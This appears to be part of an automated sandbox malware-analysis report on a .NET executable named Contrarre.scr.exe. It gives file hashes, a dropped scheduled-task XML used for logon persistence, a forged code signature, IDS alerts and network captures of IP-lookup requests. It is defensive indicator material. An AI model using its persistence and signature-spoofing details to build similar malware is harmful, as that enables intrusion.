SSDEEP:	48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewLv:HeLwYrFdOFzOz6dKrsuqK
MD5:	44387E3B9102889D46CDDEBEF5A5552C
SHA1:	250251672DBAF6726BF8984FE79798FB11B63375
SHA-256:	388AD483CC91B3FE4D56F0B43439D9B5EE0647C462A32114DCA0452D4B474871
SHA-512:	2A69D025C8D7DF61CA3F0D0328AC6CE59638E03C352D34E1D22D887B0088139CE5998D44AD3F615D94CCEFDF10CA567B9C2A757B2D7C385B5F87DDA27ADA6B81
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

C:\Users\user\AppData\Local\Temp\tmp48FF.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\JkYcIYq.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1566
Entropy (8bit):	5.09208699897332
Encrypted:	false
SSDEEP:	48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewLv:HeLwYrFdOFzOz6dKrsuqK
MD5:	44387E3B9102889D46CDDEBEF5A5552C
SHA1:	250251672DBAF6726BF8984FE79798FB11B63375
SHA-256:	388AD483CC91B3FE4D56F0B43439D9B5EE0647C462A32114DCA0452D4B474871
SHA-512:	2A69D025C8D7DF61CA3F0D0328AC6CE59638E03C352D34E1D22D887B0088139CE5998D44AD3F615D94CCEFDF10CA567B9C2A757B2D7C385B5F87DDA27ADA6B81
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

C:\Users\user\AppData\Roaming\JkYcIYq.exe

Download File

Process:	C:\Users\user\Desktop\Contrarre.scr.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	752648
Entropy (8bit):	7.45183838172928
Encrypted:	false
SSDEEP:	12288:2Gn1AJkAE/hGTyWXV7OjCLYJkMlCcY7m21yFY86LVFgFoR532UMT+Ntq09QxGTVy:2O1AM/wxOGM6MM7EY86LkFoR532/gc
MD5:	AEE9DA9C20DA235642F5772A556B7CED
SHA1:	6C9F69CF32C8430296CAADD8EB7D9EE57FC5D1EE
SHA-256:	784F9E5D1EEDC785401F6397AAB1D9FBFFF7593262F8DB591E50AE06D37CBA02
SHA-512:	B147BF4D3A4B39B07F3B4E038283C62E1B9A271944B770EE147C7273A6E48F28E2ECB02DA28BD296BFBD705EB2B1396BFBD0DE1A1A659269D16D5E6F825E9A6D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Qm.g..............0......8.......+... ...@....... ....................................@..................................+..S....@...5...........F...6........................................................... ............... ..H............text........ ...................... ..`.rsrc....5...@...6..................@..@.reloc...............D..............@..B.................+......H.......H...P.......O...H......................................................^.s.bX^.hX..M......H..kM..U.y...c".5,v.(....E:....S......;...[......%L.!~d..Xj...........O.Z.....hV%G.].p$ .7f........d2._X#.3a._p.....J^CUQ.G.)..~y!r....bD#.;.2.R......9Y.z...w...D..@.-..s.Kn*...Z......s..L.o.....m.-J L..j,S.p...+.....T$....TR$xzh...h...+9.~.U..Er..Z.\|..Mh.`..I+..y.%.&..<..Bv.rG........m..j1.}:..i..v.NL.G.t@Lja\._2.lRq.\|_.>>:-..r.>7&y.{<./Q@8.&.s...`...\|...

C:\Users\user\AppData\Roaming\JkYcIYq.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Contrarre.scr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.45183838172928
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Contrarre.scr.exe
File size:	752'648 bytes
MD5:	aee9da9c20da235642f5772a556b7ced
SHA1:	6c9f69cf32c8430296caadd8eb7d9ee57fc5d1ee
SHA256:	784f9e5d1eedc785401f6397aab1d9fbfff7593262f8db591e50ae06d37cba02
SHA512:	b147bf4d3a4b39b07f3b4e038283c62e1b9a271944b770ee147c7273a6e48f28e2ecb02da28bd296bfbd705eb2b1396bfbd0de1a1a659269d16d5e6f825e9a6d
SSDEEP:	12288:2Gn1AJkAE/hGTyWXV7OjCLYJkMlCcY7m21yFY86LVFgFoR532UMT+Ntq09QxGTVy:2O1AM/wxOGM6MM7EY86LkFoR532/gc
TLSH:	76F49EC43B25B30ACD6DAD35852AECB8A2202D68B105F5E379DE2B5BB5CD2535E0CF50
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Qm.g..............0......8.......+... ...@....... ....................................@................................

File Icon


Icon Hash:	7fe6e7e7e3e3651f

Static PE Info

General

Entrypoint:	0x110b2bee
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x11000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67886D51 [Thu Jan 16 02:22:09 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 00:00:00 08/11/2021 23:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [11002000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb2b98	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb4000	0x3580	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xb4600	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb0bf4	0xb0c00	5a4bb5e2599182565c693bf75c885c34	False	0.8119295327970297	data	7.434579570997436	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb4000	0x3580	0x3600	0b3c663966a35e0356311225002c42fc	False	0.9108072916666666	data	7.6845774728129586	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb8000	0xc	0x200	01a106e0f4dd761ed619c3683af7f320	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xb4130	0x2f83	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9727041026062649
RT_GROUP_ICON	0xb70b4	0x14	data	1.05
RT_VERSION	0xb70c8	0x2cc	data	0.4329608938547486
RT_MANIFEST	0xb7394	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-16T08:32:01.475167+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49741	132.226.247.73	80	TCP
2025-01-16T08:32:04.897073+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49765	132.226.247.73	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2025 08:32:00.528512955 CET	49741	80	192.168.2.9	132.226.247.73
Jan 16, 2025 08:32:00.533914089 CET	80	49741	132.226.247.73	192.168.2.9
Jan 16, 2025 08:32:00.533982038 CET	49741	80	192.168.2.9	132.226.247.73
Jan 16, 2025 08:32:00.534351110 CET	49741	80	192.168.2.9	132.226.247.73
Jan 16, 2025 08:32:00.539185047 CET	80	49741	132.226.247.73	192.168.2.9
Jan 16, 2025 08:32:01.217422962 CET	80	49741	132.226.247.73	192.168.2.9
Jan 16, 2025 08:32:01.221266985 CET	49741	80	192.168.2.9	132.226.247.73
Jan 16, 2025 08:32:01.226028919 CET	80	49741	132.226.247.73	192.168.2.9
Jan 16, 2025 08:32:01.431694031 CET	80	49741	132.226.247.73	192.168.2.9
Jan 16, 2025 08:32:01.458489895 CET	49748	443	192.168.2.9	104.21.48.1
Jan 16, 2025 08:32:01.458532095 CET	443	49748	104.21.48.1	192.168.2.9
Jan 16, 2025 08:32:01.459594011 CET	49748	443	192.168.2.9	104.21.48.1
Jan 16, 2025 08:32:01.467714071 CET	49748	443	192.168.2.9	104.21.48.1
Jan 16, 2025 08:32:01.467727900 CET	443	49748	104.21.48.1	192.168.2.9
Jan 16, 2025 08:32:01.475167036 CET	49741	80	192.168.2.9	132.226.247.73
Jan 16, 2025 08:32:01.927196026 CET	443	49748	104.21.48.1	192.168.2.9
Jan 16, 2025 08:32:01.927304983 CET	49748	443	192.168.2.9	104.21.48.1
Jan 16, 2025 08:32:01.933065891 CET	49748	443	192.168.2.9	104.21.48.1
Jan 16, 2025 08:32:01.933073997 CET	443	49748	104.21.48.1	192.168.2.9
Jan 16, 2025 08:32:01.933345079 CET	443	49748	104.21.48.1	192.168.2.9
Jan 16, 2025 08:32:01.975178957 CET	49748	443	192.168.2.9	104.21.48.1
Jan 16, 2025 08:32:02.001230955 CET	49748	443	192.168.2.9	104.21.48.1
Jan 16, 2025 08:32:02.043363094 CET	443	49748	104.21.48.1	192.168.2.9
Jan 16, 2025 08:32:02.110938072 CET	443	49748	104.21.48.1	192.168.2.9
Jan 16, 2025 08:32:02.111089945 CET	443	49748	104.21.48.1	192.168.2.9
Jan 16, 2025 08:32:02.111150980 CET	49748	443	192.168.2.9	104.21.48.1
Jan 16, 2025 08:32:02.148880959 CET	49748	443	192.168.2.9	104.21.48.1
Jan 16, 2025 08:32:03.915894032 CET	49765	80	192.168.2.9	132.226.247.73
Jan 16, 2025 08:32:03.920883894 CET	80	49765	132.226.247.73	192.168.2.9
Jan 16, 2025 08:32:03.920975924 CET	49765	80	192.168.2.9	132.226.247.73
Jan 16, 2025 08:32:03.921241999 CET	49765	80	192.168.2.9	132.226.247.73
Jan 16, 2025 08:32:03.926031113 CET	80	49765	132.226.247.73	192.168.2.9
Jan 16, 2025 08:32:04.601702929 CET	80	49765	132.226.247.73	192.168.2.9
Jan 16, 2025 08:32:04.605544090 CET	49765	80	192.168.2.9	132.226.247.73
Jan 16, 2025 08:32:04.610429049 CET	80	49765	132.226.247.73	192.168.2.9
Jan 16, 2025 08:32:04.816498995 CET	80	49765	132.226.247.73	192.168.2.9
Jan 16, 2025 08:32:04.820333958 CET	49772	443	192.168.2.9	104.21.48.1
Jan 16, 2025 08:32:04.820477962 CET	443	49772	104.21.48.1	192.168.2.9
Jan 16, 2025 08:32:04.820600986 CET	49772	443	192.168.2.9	104.21.48.1
Jan 16, 2025 08:32:04.828974009 CET	49772	443	192.168.2.9	104.21.48.1
Jan 16, 2025 08:32:04.829015970 CET	443	49772	104.21.48.1	192.168.2.9
Jan 16, 2025 08:32:04.897073030 CET	49765	80	192.168.2.9	132.226.247.73
Jan 16, 2025 08:32:05.286300898 CET	443	49772	104.21.48.1	192.168.2.9
Jan 16, 2025 08:32:05.286490917 CET	49772	443	192.168.2.9	104.21.48.1
Jan 16, 2025 08:32:05.316787004 CET	49772	443	192.168.2.9	104.21.48.1
Jan 16, 2025 08:32:05.316834927 CET	443	49772	104.21.48.1	192.168.2.9
Jan 16, 2025 08:32:05.317215919 CET	443	49772	104.21.48.1	192.168.2.9
Jan 16, 2025 08:32:05.365814924 CET	49772	443	192.168.2.9	104.21.48.1
Jan 16, 2025 08:32:05.544576883 CET	49772	443	192.168.2.9	104.21.48.1
Jan 16, 2025 08:32:05.587346077 CET	443	49772	104.21.48.1	192.168.2.9
Jan 16, 2025 08:32:05.652576923 CET	443	49772	104.21.48.1	192.168.2.9
Jan 16, 2025 08:32:05.652729988 CET	443	49772	104.21.48.1	192.168.2.9
Jan 16, 2025 08:32:05.652805090 CET	49772	443	192.168.2.9	104.21.48.1
Jan 16, 2025 08:32:05.656150103 CET	49772	443	192.168.2.9	104.21.48.1
Jan 16, 2025 08:32:16.764254093 CET	51770	53	192.168.2.9	1.1.1.1
Jan 16, 2025 08:32:16.769134045 CET	53	51770	1.1.1.1	192.168.2.9
Jan 16, 2025 08:32:16.769212961 CET	51770	53	192.168.2.9	1.1.1.1
Jan 16, 2025 08:32:16.774209023 CET	53	51770	1.1.1.1	192.168.2.9
Jan 16, 2025 08:32:17.235260963 CET	51770	53	192.168.2.9	1.1.1.1
Jan 16, 2025 08:32:17.240380049 CET	53	51770	1.1.1.1	192.168.2.9
Jan 16, 2025 08:32:17.240437984 CET	51770	53	192.168.2.9	1.1.1.1
Jan 16, 2025 08:32:30.295384884 CET	63021	53	192.168.2.9	162.159.36.2
Jan 16, 2025 08:32:30.300256968 CET	53	63021	162.159.36.2	192.168.2.9
Jan 16, 2025 08:32:30.300318003 CET	63021	53	192.168.2.9	162.159.36.2
Jan 16, 2025 08:32:30.305212021 CET	53	63021	162.159.36.2	192.168.2.9
Jan 16, 2025 08:32:30.764127016 CET	63021	53	192.168.2.9	162.159.36.2
Jan 16, 2025 08:32:30.769171000 CET	53	63021	162.159.36.2	192.168.2.9
Jan 16, 2025 08:32:30.769226074 CET	63021	53	192.168.2.9	162.159.36.2
Jan 16, 2025 08:32:31.294995070 CET	57227	53	192.168.2.9	1.1.1.1
Jan 16, 2025 08:32:31.299887896 CET	53	57227	1.1.1.1	192.168.2.9
Jan 16, 2025 08:32:31.299962997 CET	57227	53	192.168.2.9	1.1.1.1
Jan 16, 2025 08:32:31.304776907 CET	53	57227	1.1.1.1	192.168.2.9
Jan 16, 2025 08:32:31.762408972 CET	57227	53	192.168.2.9	1.1.1.1
Jan 16, 2025 08:32:31.767507076 CET	53	57227	1.1.1.1	192.168.2.9
Jan 16, 2025 08:32:31.767570019 CET	57227	53	192.168.2.9	1.1.1.1
Jan 16, 2025 08:33:06.432502985 CET	80	49741	132.226.247.73	192.168.2.9
Jan 16, 2025 08:33:06.432606936 CET	49741	80	192.168.2.9	132.226.247.73
Jan 16, 2025 08:33:09.816437006 CET	80	49765	132.226.247.73	192.168.2.9
Jan 16, 2025 08:33:09.816530943 CET	49765	80	192.168.2.9	132.226.247.73
Jan 16, 2025 08:33:41.460311890 CET	49741	80	192.168.2.9	132.226.247.73
Jan 16, 2025 08:33:41.465310097 CET	80	49741	132.226.247.73	192.168.2.9
Jan 16, 2025 08:33:44.819740057 CET	49765	80	192.168.2.9	132.226.247.73
Jan 16, 2025 08:33:44.824745893 CET	80	49765	132.226.247.73	192.168.2.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2025 08:32:00.507554054 CET	57909	53	192.168.2.9	1.1.1.1
Jan 16, 2025 08:32:00.515150070 CET	53	57909	1.1.1.1	192.168.2.9
Jan 16, 2025 08:32:01.449728966 CET	58863	53	192.168.2.9	1.1.1.1
Jan 16, 2025 08:32:01.457855940 CET	53	58863	1.1.1.1	192.168.2.9
Jan 16, 2025 08:32:16.763720989 CET	53	59159	1.1.1.1	192.168.2.9
Jan 16, 2025 08:32:30.294840097 CET	53	64984	162.159.36.2	192.168.2.9
Jan 16, 2025 08:32:30.806648970 CET	50217	53	192.168.2.9	1.1.1.1
Jan 16, 2025 08:32:30.814619064 CET	53	50217	1.1.1.1	192.168.2.9
Jan 16, 2025 08:32:31.294594049 CET	53	56920	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 16, 2025 08:32:00.507554054 CET	192.168.2.9	1.1.1.1	0xd97c	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:32:01.449728966 CET	192.168.2.9	1.1.1.1	0xb80e	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:32:30.806648970 CET	192.168.2.9	1.1.1.1	0x6385	Standard query (0)	198.187.3.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 16, 2025 08:31:54.944902897 CET	1.1.1.1	192.168.2.9	0x680e	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 08:31:54.944902897 CET	1.1.1.1	192.168.2.9	0x680e	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:32:00.515150070 CET	1.1.1.1	192.168.2.9	0xd97c	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 08:32:00.515150070 CET	1.1.1.1	192.168.2.9	0xd97c	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:32:00.515150070 CET	1.1.1.1	192.168.2.9	0xd97c	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:32:00.515150070 CET	1.1.1.1	192.168.2.9	0xd97c	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:32:00.515150070 CET	1.1.1.1	192.168.2.9	0xd97c	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:32:00.515150070 CET	1.1.1.1	192.168.2.9	0xd97c	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:32:01.457855940 CET	1.1.1.1	192.168.2.9	0xb80e	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:32:01.457855940 CET	1.1.1.1	192.168.2.9	0xb80e	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:32:01.457855940 CET	1.1.1.1	192.168.2.9	0xb80e	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:32:01.457855940 CET	1.1.1.1	192.168.2.9	0xb80e	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:32:01.457855940 CET	1.1.1.1	192.168.2.9	0xb80e	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:32:01.457855940 CET	1.1.1.1	192.168.2.9	0xb80e	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:32:01.457855940 CET	1.1.1.1	192.168.2.9	0xb80e	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:32:30.814619064 CET	1.1.1.1	192.168.2.9	0x6385	Name error (3)	198.187.3.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49741	132.226.247.73	80	7756	C:\Users\user\Desktop\Contrarre.scr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:32:00.534351110 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 08:32:01.217422962 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:32:01 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 16, 2025 08:32:01.221266985 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 16, 2025 08:32:01.431694031 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:32:01 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49765	132.226.247.73	80	8076	C:\Users\user\AppData\Roaming\JkYcIYq.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:32:03.921241999 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 08:32:04.601702929 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:32:04 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
